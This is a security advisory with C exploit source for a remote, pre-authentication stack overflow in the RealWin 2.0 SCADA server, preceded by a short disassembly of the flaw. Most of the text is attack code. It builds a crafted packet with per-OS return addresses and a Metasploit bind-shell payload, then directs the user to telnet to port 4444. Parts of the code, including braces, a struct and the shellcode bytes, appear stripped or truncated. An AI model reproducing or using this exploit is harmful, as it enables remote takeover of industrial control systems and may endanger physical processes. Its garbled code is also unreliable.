


"RealWin is a SCADA server product which includes a FlexView HMI and
runs on current Microsoft Windows platforms (2000 and XP). It can
operate on a single PC or multiple PCs connected through a TCP/IP
network. It reads and maintains data returned from field devices using
drivers, stores data for historical access, runs Command Sequence
Language (CSL) scripts and generates alarms as defined in the system."


The version available for download
(http://www.realflex.com/download/form.php) is likely an old one so
newer versions may, or may not, be vulnerable. Note that the server is
affected by other flaws, but this one is pretty clear and 100% reliable.

The bug is a classic stack overflow while processing a specially crafted
FC_INFOTAG/SET_CONTROL packet. RealWin server accepts connections from
FlewWin clients which use a propietary protocol. We can exploit this
flaw from remote without having valid credentials .
.text:0042BFFE                 call    sub_419690 ; Get Packet.PayloadLen

.text:0042C003                 movzx   ecx, ax
.text:0042C006                 mov     edx, ecx
.text:0042C008                 shr     ecx, 2
.text:0042C00B                 mov     esi, ebx

.text:0042C00D                 lea     edi, [esp+638h+var_2E0]
.text:0042C014                 rep movsd
.text:0042C016                 mov     ecx, edx
.text:0042C018                 and     ecx, 3

.text:0042C01B                 rep movsb

That's all, just for fun.


////	DATAC RealWin 2.0 SCADA Software	- Remote PreAuth Exploit -. 
////	--------------------------------------------------------
////	This code can only be used for personal study
////    and/or research purposes on even days.
////	The author is not responsible for any illegal usage.
////	So if you flood your neighborhood that's your f******* problem =)
////	---------------
////	Note
////	---------------
////	## The exploit has been tested against a build that seems pretty old.
////	## Therefore this flaw may be not reproducible on newer versions.
////	http://www.dataconline.com
////	http://www.realflex.com/download/form.php
////	Ruben Santamarta www.reversemode.com

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>

#pragma comment(lib,"wsock32.lib")

#define REALWIN_PORT	910
#define PACKET_HEADER_MAGIC 0x67542310

#define EXPLOIT_LEN		0x810
#define PING_LEN		0x200

#define FUNC_PING		0x70001

typedef struct {
        const char *szTarget;
        ULONG_PTR retAddr;

TARGET targets[] = {
                { "Windows 2000 SP4 [ES]",	0x779D4F6A},	// call esp - oleaut32.dll
        { "Windows 2000 SP4 [EN]",	0x77E3C256 },	// jmp esp - user32.dll
        { "Windows XP SP2 [EN]",	0x7C914393 },	// call  esp - ntdll.dll 
                { "Windows XP SP2 [ES]",	0x7711139B},	// call esp - oleaut32.dll
                { NULL,0xFFFFFFFF}

int main(int argc, char* argv[])
        WSADATA ws; 
        SOCKET tcp_socket, tcp_ping; 
        char bBuffer[0x10] = {0};
        struct sockaddr_in peer;
        char *pExploitPacket = NULL;
        char *pPingPacket = NULL;
        ULONG_PTR	uFixed;

        /* win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
        unsigned char scode[] =

        int i,c;
        printf("\n\t\t- DATAC RealWin 2.0 SCADA Software -\n");
        printf("\tProtocol Command INFOTAG/SET_CONTROL Stack Overflow\n");
        printf("\nRuben Santamarta - reversemode.com \n\n");

        if( argc < 3 )
                printf("\nusage: exploit.exe ip TargetNumber");
                printf("\n\nexample: exploit 1\n\n");
                for( i = 0; targets[i].szTarget; i++ )
                        printf("\n[ %d ] - %s", i, targets[i].szTarget);


        peer.sin_family = AF_INET;
        peer.sin_port = htons( REALWIN_PORT );
        peer.sin_addr.s_addr = inet_addr( argv[1] ); 

        tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
        if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(sockaddr_in)) )
                printf("\n[!!] Host unreachable :( \n\n");
        pExploitPacket = (char*) calloc( EXPLOIT_LEN, sizeof(char) );
        pPingPacket = (char*) calloc( PING_LEN, sizeof(char) );

        memset( (void*)pExploitPacket, 0x90, EXPLOIT_LEN);
        memset( (void*)pPingPacket, 0x90, PING_LEN);
        uFixed =  targets[atoi(argv[2])].retAddr;
        for( i=0x0; i< 0xbe; i++)
                *( ( ULONG_PTR* ) (BYTE*)(pExploitPacket  + i*sizeof(ULONG_PTR) +2 )  ) = uFixed;

        // Bypass silly things.
        *( ( ULONG_PTR* ) (BYTE*)(pExploitPacket  + 0xbe*sizeof(ULONG_PTR) +2 )  ) = 0x404040; 

        // MAGIC_HEADER
        *( ( ULONG_PTR* ) pExploitPacket ) = PACKET_HEADER_MAGIC;
        //Payload Length
        *( ( ULONG_PTR* ) pExploitPacket + 1 ) = 0x800;				
        *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 10 ) ) =  FUNC_INFOTAG_SET_CONTROL;
        //First Parameter
        *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 14 ) ) =  0x4; // Internal Switch
        *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 44 ) ) =  0xDEADBEEF;	// Our marker

        memcpy(	(void*)((char*)pExploitPacket + EXPLOIT_LEN - sizeof(scode))
        send(tcp_socket, pExploitPacket, EXPLOIT_LEN, 0 );

        printf("[+] Exploit packet sent...now checking host availability\n");

        // MAGIC_HEADER
        *( ( ULONG_PTR* ) pPingPacket ) = PACKET_HEADER_MAGIC;
        //Payload Length
        *( ( ULONG_PTR* ) pPingPacket + 1 ) = 0x20;				
        *( (ULONG_PTR*)(( BYTE*) pPingPacket + 10 ) ) =  FUNC_PING;
        //First Parameter
        *( (ULONG_PTR*)(( BYTE*) pPingPacket + 14 ) ) =  0x1;	// whatever
        *( (ULONG_PTR*)(( BYTE*) pPingPacket + 44 ) ) =  0xDEADBEEF; //Our marker

        tcp_ping = socket(AF_INET, SOCK_STREAM, 0);
        if ( connect(tcp_ping, (struct sockaddr*) &peer, sizeof(sockaddr_in)) )
                printf("\n[!!] Host died, long live to the Host!  \n\n");
        i = recv(tcp_ping, bBuffer, 0x8, 0 );
        if( i )
                printf("[+] The host is up and running\n\t:: %d bytes received: ",i);
                for(  c = 0; c<i; c++)
                        printf("%02X ", (unsigned char)bBuffer[c]);
        }else	{
                printf("\n[!!] Host died, long live to the Host!  \n\n");


        printf("\n[+] Try: telnet %s 4444\n\n",argv[1]);	

        return 0;